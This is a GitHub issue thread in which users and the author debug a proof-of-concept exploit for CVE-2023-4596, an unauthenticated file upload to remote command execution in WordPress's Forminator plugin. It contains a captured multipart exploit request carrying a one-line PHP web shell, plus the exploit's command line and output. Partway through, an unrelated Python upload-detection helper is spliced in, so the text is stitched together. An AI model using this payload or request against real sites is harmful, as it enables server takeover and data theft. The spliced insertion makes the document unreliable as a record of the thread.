E1A / CVE-2023-4596

PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.

Not working on Windows #3

Closed PunitTailor55 closed 1 year ago

PunitTailor55 commented 1 year ago

I am trying the given exploit but it is not working on Windows.

[+] Sending payload to target
<Response [200]>
[+] Successful file upload!

Uploaded File Location: http://127.0.0.1:8000/wp-content/uploads/2023/09/elsRmvexqL.php

[+] Sending request to uploaded file...
<Response [404]>
[-] Server returned an unexpected response: 404

It shows the file uploaded successfully, but it's giving a 404.

E1A commented 1 year ago

Hi there!

Could you check the following things:

Thanks

PunitTailor55 commented 1 year ago

I have a vulnerable version:

[+] Vulnerable version found: 1.24.6

There is no file in the /upload folder.

I have captured the following request in Burp and used your exploit.

------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="postdata-1-post-image"; filename="elsRmvexqL.php"
Content-Type: application/octet-stream

<?php
$_GET['function']($_GET['cmd']);
?>
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="forminator_nonce"

68e7cad1fc
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="_wp_http_referer"

/?page_id=7
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="form_id"

6
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="current_url"

http://127.0.0.1:8000/?page_id=7
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="action"

forminator_submit_form_custom-forms

In the exploit, the file uploads successfully, but no file is created.
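As an added example (not part of this issue or the E1A repository), a small Python triage helper that parses a multipart body like the Burp capture above and flags a server-executable file submitted through a Forminator postdata post-image field, which is what a WAF rule or upload-log review for this CVE would key on. The field-name regex, the extension list and the sample body are assumptions constructed from the capture; the uploaded file contents are omitted.

```python
import re

EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps"}  # run by Apache/PHP
FORMINATOR_IMAGE_FIELD = re.compile(r"postdata-\d+-post-image")  # field name seen in the capture (assumed)

def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal multipart/form-data splitter: one dict (name, filename, data) per part."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:            # chunk 0 is the preamble
        if chunk.startswith(b"--"):                # "--boundary--" closes the body
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disp = re.search(r"Content-Disposition:[^\r\n]*", head.decode("latin-1"), re.I)
        if not disp:
            continue
        params = dict(re.findall(r'(\w+)="([^"]*)"', disp.group(0)))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "data": data.rstrip(b"\r\n")})
    return parts

def find_risky_uploads(body: bytes, boundary: str) -> list:
    """Findings for server-executable files submitted through a Forminator post-image field."""
    parts = parse_multipart(body, boundary)
    fields = {p["name"]: p["data"].decode("latin-1") for p in parts if p["filename"] is None}
    findings = []
    for p in parts:
        fname = p["filename"]
        if fname is None or not FORMINATOR_IMAGE_FIELD.fullmatch(p["name"] or ""):
            continue
        ext = fname.lower().rsplit(".", 1)[-1] if "." in fname else ""
        if ext in EXECUTABLE_EXTS:
            findings.append(f"{fname} via {p['name']} (form_id={fields.get('form_id')}, action={fields.get('action')})")
    return findings

BOUNDARY = "----WebKitFormBoundarytsSnyRY1FWmgGHpA"
SAMPLE_BODY = (  # constructed from the capture above; file contents omitted
    b"------WebKitFormBoundarytsSnyRY1FWmgGHpA\r\n"
    b'Content-Disposition: form-data; name="postdata-1-post-image"; filename="elsRmvexqL.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n<?php /* omitted */ ?>\r\n"
    b"------WebKitFormBoundarytsSnyRY1FWmgGHpA\r\n"
    b'Content-Disposition: form-data; name="form_id"\r\n\r\n6\r\n'
    b"------WebKitFormBoundarytsSnyRY1FWmgGHpA\r\n"
    b'Content-Disposition: form-data; name="action"\r\n\r\nforminator_submit_form_custom-forms\r\n'
    b"------WebKitFormBoundarytsSnyRY1FWmgGHpA--\r\n"
)

if __name__ == "__main__":
    for finding in find_risky_uploads(SAMPLE_BODY, BOUNDARY):
        print("[!] suspicious upload:", finding)
```

The same check applied to a web server's request log or a WAF's multipart inspection hook would catch the submission regardless of whether the file ends up reachable at the URL the PoC guesses.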

E1A commented 1 year ago

It does indeed look like you're using postdata.

I just tested it again on the latest Windows WP. My file was successfully uploaded, but I got a 404, because I installed WordPress in the /wordpress directory. The script only looks for \wp-content\uploads\2023\09\file.php, so it could not locate it. Could this also be the issue for you? Defender was also blocking the file, so that could also be an issue.

When installing on XAMPP, my file location is C:\xampp\htdocs\wordpress\wp-content\uploads\2023\09. What service are you using, and what is yours?

PunitTailor55 commented 1 year ago

I am using Docker, and the file location is /wp-content/uploads/2023/09/adsad.php. I have disabled the firewall, but the issue is still there.

E1A commented 1 year ago

Really weird, not sure what the issue could be. Would you be open to a call via Discord to find the problem?

E1A commented 1 year ago

ping

forme9 commented 12 months ago

Hi, I also have the same problem. How can I solve it?

E1A commented 12 months ago

Hi!

Could you check the following things:

Thanks

forme9 commented 12 months ago

Hi! 121 Using -v to check, the version is vulnerable. I can find "forminator-field-post-image-postdata" in the page source. I used Docker; the path (wp-content/uploads/2023/11/NrIaoXkWLS.php) was generated, but the final .php file could not be generated.

Thanks for the help

E1A commented 12 months ago

Can you paste the command you used and the output that you received?

forme9 commented 12 months ago

Sure! This is the command entered:

python exploit.py -u http://127.0.0.1/?p=38 -r

This URL can normally access the post form page.

output:

[+] Sending payload to target
[+] Successful file upload!

Uploaded File Location: http://127.0.0.1/wp-content/uploads/2023/11/ZPowyMwZur.php

[+] Sending request to uploaded file...
[-] Server returned an unexpected response: 404

The path is normal, and 2023/11 is generated in wp-content/uploads, but the "ZPowyMwZur.php" file is not generated. There is no content under the 11 directory.

E1A commented 11 months ago

Could you try it with Python 3?

forme9 commented 11 months ago

Yes, I'm using Python 3.11.